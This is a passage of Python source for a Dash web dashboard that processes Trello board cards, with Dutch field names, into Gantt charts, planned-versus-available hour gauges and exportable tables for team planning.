epicIdNameCategory.append((i, j['Naam'], j[config.get(\n 'Custom Field for Categories')]))\n for i, j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n for i, j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']:\n j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i, j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n cardstodelete = []\n for i, j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n hours = {}\n for i, j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j\n [config['Custom Field for Starting date']], config[\n 'Custom Field for Ending date']: j[config[\n 'Custom Field for Ending date']], config[\n 'Custom Field with hours']: j[config[\n 'Custom Field with hours']]}\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n for x in range(0, numdays):\n tmpdatesdict[str(now + timedelta(days=x))] = {}\n for x in range(0, numdayshistory):\n tmpdatesdict[str(now - timedelta(days=x))] = {}\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i)\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten\n .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i\n [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(\n i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(\n [card['Status'] for card in kaarten.values()])), config.get(\n 'Custom Field for Categories'): list(dict.fromkeys([card[config.get\n ('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([(card[\n config.get('Custom Field for Person')] if card[config.get(\n 'Custom Field for Person')] != None else 'Geen ' + config.get(\n 'Custom Field for Person')) for card in kaarten.values()]))}\n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Cognosrapport': kaart[\n 'Cognosrapport'], 'Niet meenemen in telling': kaart[\n 'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], config.get(\n 'Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in\n hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i, '%Y-%m-%d').date()\n for k, l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get(\n 'Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')\n ] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get(\n 'Custom Field with hours')]) / int(delta.days)\n urenperdagperkaart[l['Naam']]['urenperdag'][i\n ] = hoursperday\n except:\n pass\n for k, l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get('Custom Field for Ending date')\n ].date():\n hoursperday = int(l[config.get('Custom Field with hours')]\n ) / int(30.4)\n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n for i, j in urenperdagperkaart.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n for i, j in beschikbareuren.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i, j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k, l in j['urenperperiode'].items():\n j[k] = round(l, 2)\n del j['urenperperiode']\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],\n type='bar', opacity='0.6'))\n epicbars = []\n tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in\n kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get(\n 'Custom Field with hours')])\n epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[\n value for value in epicsforbarchart.values()], type='bar', text=[\n value for value in epicsforbarchart.values()], textposition=\n 'outside', opacity='0.6'))\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,\n '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,\n '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,\n '%Y%m').strftime('%B'))]\n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n twomonths]))\n deltathismonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == twomonths]))\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5, \n deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},\n {'range': [deltathismonth * 0.9, deltathismonth], 'color':\n '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5, \n deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':\n '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}\n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *\n 0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5, \n deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [\n deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':\n '#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}\n gaugefig = go.Figure()\n gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},\n value=gaugegeplandthismonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltathismonth}, gauge=\n gaugestepsthismonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},\n value=gaugegeplandnextmonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltanextmonth}, gauge=\n gaugestepsnextmonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},\n value=gaugegeplandtwomonths, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').\n strftime('%B')}, delta={'reference': deltatwomonths}, gauge=\n gaugestepstwomonths))\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,\n 'gaugefig': gaugefig}\n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str, bool]):\n columntypes[key] = 'text'\n columntypesurenpermaand = dict(columntypes)\n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':\n urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':\n graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=\n dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}\n\n\ndef make_layout():\n return html.Div(className='First Div', children=[html.Div(style={\n 'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',\n 'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',\n 'background':\n 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'\n , 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',\n 'margin-left': '1%', 'border-radius': '10px', 'text-align':\n 'center'}, className='Banner', children=[html.Div(style={'display':\n 'inline-block', 'width': '80%'}, children=[html.H1(\n 'Trello borden USD')]), html.Div(style={'display': 'inline-block',\n 'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(\n 'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]\n ), html.H5('Kies hieronder een bord', style={'text-align': 'center'\n }), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],\n 'value': i['id']} for i in boards], value=boards[0]['id']), html.\n Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div\n (id='test')])\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets,\n external_scripts=external_scripts, url_base_pathname='/dash/')\napp.layout = make_layout\napp.config['suppress_callback_exceptions'] = True\n\n\n@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'\n ), Input('refreshdatabtn', 'n_clicks')])\ndef create_maindiv(value, n_clicks):\n get_data(value)\n import os\n if os.name == 'nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')\n return html.Div(className='', children=[dcc.Markdown(\n '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',\n children=[dcc.Tab(label='Gantt charts', style=globals['styles'][\n 'tabs'], children=[html.Div(className='tab2_div1', style=globals[\n 'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=\n globals['styles']['divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'\n )])]), html.Div(className='tab2_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownganttepics',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n 'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(\n style=globals['styles']['divgraphs'], children=[dcc.Graph(id=\n 'ganttepics')])]), html.Div(className='tab2_div3', style=globals[\n 'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.\n Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoon', options=[{'label': name, 'value': name} for\n name in data['arrays'][config.get('Custom Field for Person')]]),\n dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoonstatus', options=[{'label': name, 'value':\n name} for name in data['arrays']['statuses']], value=data['arrays']\n ['statuses'], multi=True), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab\n (label='Data export', style=globals['styles']['tabs'], children=[\n html.Div(className='tab3_div1', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n \"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.\"\n ), dcc.Markdown(\n \"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.\"\n )])]), html.Div(className='tab3_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(\n 'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(id='table_plattedump', columns=[{'name': i,\n 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': \n True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']\n ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(\n 'records'), hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx', export_headers='display', export_columns=\n 'all', filter_action='native', sort_action='native', sort_mode=\n 'multi', style_table={'overflowX': 'scroll'}, style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),\n html.Div(className='tab3_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Uren per maand'), dcc.Markdown(\n 'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'\n ), dcc.Markdown(\n 'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'\n ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':\n i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),\n 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in\n data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][\n 'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data\n ['dfs']['columntypesurenpermaand']], export_format='xlsx',\n export_headers='display', export_columns='all', filter_action=\n 'native', sort_action='native', sort_mode='multi', style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=\n 'Langetermijnplanning', style=globals['styles']['tabs'], children=[\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.\n Markdown('De focus hierbij ligt vooral op de categorieen.')])]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownurenpermaand',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n config.get('Custom Field for Categories')] if name != None], multi=\n True, searchable=False, value=data['arrays'][config.get(\n 'Custom Field for Categories')]), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(\n className='tab1_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.\n Markdown(\n '*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'\n ), dcc.Markdown(\n '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'\n ), dcc.Markdown(\n '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland', figure={'data': data['graphdata'][\n 'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),\n html.Div(className='tab1_div4', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per epic)'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland_epics', figure={'data': data[\n 'graphdata']['nietingeplandepics'], 'layout': globals[\n 'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][\n 'tabs'], label='Tactische planning', children=[html.Div(className=\n 'maindivs', style=globals['styles']['maindivs'], children=[html.H3(\n 'Uitleg'), dcc.Markdown(\n 'In dit tabblad is een middellange termijnplanning te zien.')]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Totalen'), dcc.Markdown(\n 'Hieronder staan twee totaaloverzichten van de aankomende maanden.'\n ), dcc.Markdown(\n 'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'\n ), dcc.Markdown(\n 'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className\n ='maindivs', style=globals['styles']['maindivs'], children=[html.H4\n ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in\n data['arrays']['threemonths']], multi=False, searchable=False,\n value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[\n 'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])\n ])])])\n\n\n@app.callback(Output('gantttactisch', 'figure'), [Input(\n 'dropdowngantttactisch', 'value')])\ndef update_gantttactisch(v1):\n if v1 != None:\n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus1 = str(int(v1) + 1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4]) - 1) + '12'\n else:\n v1min1 = str(int(v1) - 1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus2 = str(int(v1) + 2)\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata = []\n monthkey = int(v1)\n for i, j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')\n ) <= monthkey and int(datetime.strftime(j[\n 'Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(\n v1min1 + '01', '%Y%m%d').date():\n start = datetime.strptime(v1min1 + '01', '%Y%m%d'\n ).date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(\n v1plus2 + '01', '%Y%m%d').date():\n eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'\n ).date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'], Start=start,\n Finish=eind, Resource=j['Naam'] + ' (uren: ' +\n str(round(data['urenperdagperkaart'][j['Naam']]\n ['urenperperiode'][v1])) + ')'))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str, r))\n s1 = 'rgb('\n s3 = ')'\n rgb.append(s1 + s2 + s3)\n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=\n True, group_tasks=False, showgrid_x=True, showgrid_y=True,\n colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +\n '-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],\n line={'shape': 'spline', 'color': 'black', 'width': 4},\n showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +\n v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],\n y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',\n 'width': 4}, showlegend=False))\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',\n 'value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('urenpermaand', 'figure'), [Input(\n 'dropdownurenpermaand', 'value')])\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['urenperdagperkaart'].values() if value[config.get(\n 'Custom Field for Categories')] == 'Regulier werk']), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=\n 'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers', marker={'symbol': 'triangle-up-open',\n 'size': 10}, stackgroup='one'))\n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for\n value in data['urenperdagperkaart'].values() if value[\n config.get('Custom Field for Categories')] == categorie\n ]), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,\n name=categorienaam, line={'shape': 'spline', 'smoothing': \n 0.4}, mode='lines+markers', marker={'symbol':\n 'triangle-up-open', 'size': 10}, stackgroup='one'))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['beschikbareuren'].values()]), 0))\n bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[\n 'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':\n 'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))\n return {'data': bars, 'layout': layout}\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\nif __name__ == '__main__':\n app.run_server(debug=False, host='0.0.0.0', port=8050)\n",
